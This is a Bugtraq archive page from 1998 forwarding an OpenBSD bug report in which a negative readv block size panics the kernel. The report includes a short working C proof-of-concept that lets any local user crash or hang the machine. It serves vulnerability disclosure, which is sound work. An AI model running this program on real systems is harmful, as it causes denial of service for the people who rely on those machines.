Bugtraq mailing list archives
Fwd: Any user can panic OpenBSD machine
From: mfuhr () DIMENSIONAL COM (Michael Fuhr)
Date: Mon, 27 Jul 1998 11:23:59 -0600
-----Forwarded message from jon () oaktree co uk----- Message-Id: <199807271126.MAA16724 () chalk oaktree net uk> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST) From: jon () oaktree co uk To: gnats () openbsd org X-Send-Pr-Version: 3.97 Subject: kernel/549: Any user can panic OpenBSD machine Sender: owner-bugs () openbsd org
Number: 549 Category: kernel Synopsis: readv with -ve block size panics kernel Confidential: yes Severity: critical Priority: high Responsible: bugs State: open Class: sw-bug Submitter-Id: net Arrival-Date: Mon Jul 27 05:40:02 MDT 1998 Last-Modified: Originator: Jon Ribbens Organization:
\/ Jon Ribbens / jon () oaktree co uk
Release: 2.3 Environment:
System : OpenBSD 2.3 Architecture: OpenBSD.i386 Machine : i386
Description:
readv with one of the blocks having a -ve size panics the kernel. Oops.
How-To-Repeat:
#include <sys/types.h> #include <sys/uio.h> #include <unistd.h> int main(void) { struct iovec iov[1]; char buffer[1024]; iov[0].iov_base = buffer; iov[0].iov_len = -1; return readv(0, iov, 1); } run the above program, type a few characters, press return, observe either kernel panic or machine hang. panic message is "panic: ureadc: non-positive resid". Any user can do this.
Fix:
Dunno I'm afraid.
Audit-Trail: Unformatted:
-----End of forwarded message----- -- Michael Fuhr http://www.fuhr.net/~mfuhr/
Current thread:
- Re: Another NEW mIRC bug and ALL mIRC Exploit patches, (continued)
- Re: Another NEW mIRC bug and ALL mIRC Exploit patches Mike Zimmerman (Jul 25)
- small bug in 5/98 distribution Sun 4070627 Lloyd Vancil (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Brandon Hume (Jul 26)
- Re: small bug in 5/98 distribution Sun 4070627 Casper Dik (Jul 27)
- FW: Alert: Arbitrary code execution via email or news Patrick Oonk (Jul 27)
- ISS Security Advisory -- MS Exchange 5.x Jon Larimer (Jul 27)
- [ NT SECURITY ALERT ] New Local GetAdmin Exploit MJE (Jul 27)
- Microsoft Security Bulletin (MS98-009) Aleph One (Jul 28)
- Microsoft Security Bulletin (MS98-008) Aleph One (Jul 27)
- Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine David Maxwell (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Dag-Erling Coidan Smørgrav (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Angelos D. Keromytis (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- Re: Fwd: Any user can panic OpenBSD machine Alfred Huger (Jul 28)